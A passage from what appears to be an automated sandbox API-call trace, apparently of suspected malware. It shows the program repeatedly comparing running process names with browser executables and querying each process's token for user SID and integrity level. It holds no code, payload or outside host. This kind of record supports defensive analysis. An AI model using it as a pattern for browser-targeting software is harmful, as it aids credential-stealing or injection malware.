lpString2="filesdetectedlosebenjamin.exe") returned 1 [0249.599] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0249.599] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0249.599] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0249.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xbc [0249.599] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.599] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.599] GetLastError () returned 0x7a [0249.599] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.599] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.599] CloseHandle (hObject=0x114) returned 1 [0249.599] CloseHandle (hObject=0xbc) returned 1 [0249.599] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.599] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.599] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.599] GetLastError () returned 0x7a [0249.599] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.599] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.599] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.600] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0249.600] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0249.600] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0249.600] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0249.600] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0249.600] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0249.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xbc [0249.600] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.600] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.600] GetLastError () returned 0x7a [0249.600] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.600] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.600] CloseHandle (hObject=0x114) returned 1 [0249.600] CloseHandle (hObject=0xbc) returned 1 [0249.600] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.600] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.600] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.600] GetLastError () returned 0x7a [0249.600] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.600] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.600] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.600] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.600] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.600] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.600] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.600] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.600] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xbc [0249.600] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.600] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.600] GetLastError () returned 0x7a [0249.600] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.600] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.600] CloseHandle (hObject=0x114) returned 1 [0249.600] CloseHandle (hObject=0xbc) returned 1 [0249.601] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.601] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.601] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.601] GetLastError () returned 0x7a [0249.601] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.601] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.601] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.601] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0249.601] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0249.601] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0249.601] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0249.601] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0249.601] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0249.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xbc [0249.601] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.601] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.601] GetLastError () returned 0x7a [0249.601] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.601] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.601] CloseHandle (hObject=0x114) returned 1 [0249.601] CloseHandle (hObject=0xbc) returned 1 [0249.601] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.601] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.601] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.601] GetLastError () returned 0x7a [0249.601] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.601] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.601] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.601] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0249.601] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0249.601] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0249.601] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0249.601] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0249.601] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0249.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xbc [0249.602] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.602] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.602] GetLastError () returned 0x7a [0249.602] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.602] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.602] CloseHandle (hObject=0x114) returned 1 [0249.602] CloseHandle (hObject=0xbc) returned 1 [0249.602] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.602] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.602] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.602] GetLastError () returned 0x7a [0249.602] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.602] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.602] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.602] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0249.602] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0249.602] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0249.602] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0249.602] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0249.602] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0249.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xbc [0249.602] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.602] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.602] GetLastError () returned 0x7a [0249.602] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.602] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.602] CloseHandle (hObject=0x114) returned 1 [0249.602] CloseHandle (hObject=0xbc) returned 1 [0249.602] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.602] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.602] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.602] GetLastError () returned 0x7a [0249.602] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.603] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.603] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.603] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0249.603] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0249.603] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0249.603] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0249.603] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0249.603] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0249.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xbc [0249.603] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.603] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.603] GetLastError () returned 0x7a [0249.603] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.603] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.603] CloseHandle (hObject=0x114) returned 1 [0249.603] CloseHandle (hObject=0xbc) returned 1 [0249.603] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.603] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.603] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.603] GetLastError () returned 0x7a [0249.603] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.603] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.603] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.603] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0249.603] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0249.603] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0249.603] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0249.603] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0249.603] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0249.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xbc [0249.603] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.603] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.603] GetLastError () returned 0x7a [0249.603] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.603] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.604] CloseHandle (hObject=0x114) returned 1 [0249.604] CloseHandle (hObject=0xbc) returned 1 [0249.604] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.604] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.604] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.604] GetLastError () returned 0x7a [0249.604] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.604] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.604] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.604] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0249.604] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0249.604] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0249.604] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0249.604] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0249.604] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0249.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xbc [0249.604] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.604] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.604] GetLastError () returned 0x7a [0249.604] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.604] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.604] CloseHandle (hObject=0x114) returned 1 [0249.604] CloseHandle (hObject=0xbc) returned 1 [0249.604] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.604] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.604] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.604] GetLastError () returned 0x7a [0249.604] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.604] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.604] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.604] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0249.604] lstrcmpiW (lpString1="chrome.exe", 